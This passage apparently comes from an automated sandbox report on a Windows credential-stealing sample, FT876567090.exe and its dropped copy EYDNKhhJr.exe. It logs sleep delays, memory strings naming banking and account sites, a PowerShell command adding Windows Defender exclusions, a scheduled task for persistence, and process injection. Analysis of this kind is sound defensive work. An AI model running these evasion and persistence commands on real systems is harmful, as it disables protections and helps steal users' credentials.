Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -595030s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe TID: 7976	Thread sleep time: -594375s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599867	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599530	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 599079	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596873	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596287	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595466	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595137	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Thread delayed: delay time: 594201	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599319
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598214
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597999
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597888
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597289
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596505
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 596047
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595817
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 595030
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Thread delayed: delay time: 594375

Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000C.00000002.2209468588.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FT876567090.exe, 0000000A.00000002.3392046185.0000000003239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f0d506ad3d1<
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000359F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd1f22c705a7ac<
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FT876567090.exe, 0000000A.00000002.3388595176.0000000001105000.00000004.00000020.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3387590250.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.0000000004664000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: EYDNKhhJr.exe, 0000000F.00000002.3396800295.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe

Code function: 10_2_05B09578 LdrInitializeThunk,

10_2_05B09578

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FT876567090.exe

Memory written: C:\Users\user\Desktop\FT876567090.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Users\user\Desktop\FT876567090.exe "C:\Users\user\Desktop\FT876567090.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Users\user\Desktop\FT876567090.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
